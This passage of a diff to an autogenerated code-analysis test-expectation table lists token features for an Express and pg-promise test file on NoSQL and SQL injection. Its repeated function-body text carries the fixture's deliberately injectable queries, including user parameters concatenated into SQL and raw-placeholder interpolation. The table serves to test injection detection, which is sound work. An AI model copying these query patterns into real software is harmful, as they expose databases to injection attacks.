db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:13:49:5 | {\\n ... n\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:46:13:49:5 | {\\n ... n\\n } | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:8 | id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:8 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:8 | id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:8 | id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:8 | id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:7:47:23 | id: req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:13 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:13 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:13 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:13 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:13 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:20 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:20 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:20 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:20 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:20 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:23 | req.params.id | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:23 | req.params.id | InputAccessPathFromCallee | 0.values.id | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:23 | req.params.id | InputArgumentIndex | 0 | @@ -3789,6 +18488,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:23 | req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:23 | req.params.id | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:11:47:23 | req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:15:47:20 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:15:47:20 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:15:47:20 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:15:47:20 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:15:47:20 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:22:47:23 | id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:22:47:23 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:22:47:23 | id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:22:47:23 | id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:47:22:47:23 | id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:10 | name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:10 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:10 | name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:10 | name | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:10 | name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:7:48:27 | name: r ... ms.name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:15 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:15 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:15 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:15 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:15 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:22 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:22 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:22 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:22 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:22 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:27 | req.params.name | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:27 | req.params.name | InputAccessPathFromCallee | 0.values.name | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:27 | req.params.name | InputArgumentIndex | 0 | @@ -3799,6 +18533,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:27 | req.params.name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:27 | req.params.name | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:13:48:27 | req.params.name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:17:48:22 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:17:48:22 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:17:48:22 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:17:48:22 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:17:48:22 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:24:48:27 | name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:24:48:27 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:24:48:27 | name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:24:48:27 | name | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:48:24:48:27 | name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:8 | db.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:8 | db.one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:8 | db.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:8 | db.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:51:8 | db.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | exceptional return of db.one( ... }\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | exceptional return of db.one( ... }\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | exceptional return of db.one( ... }\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | exceptional return of db.one( ... }\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:3:58:4 | exceptional return of db.one( ... }\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:6:51:8 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:6:51:8 | one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:6:51:8 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT 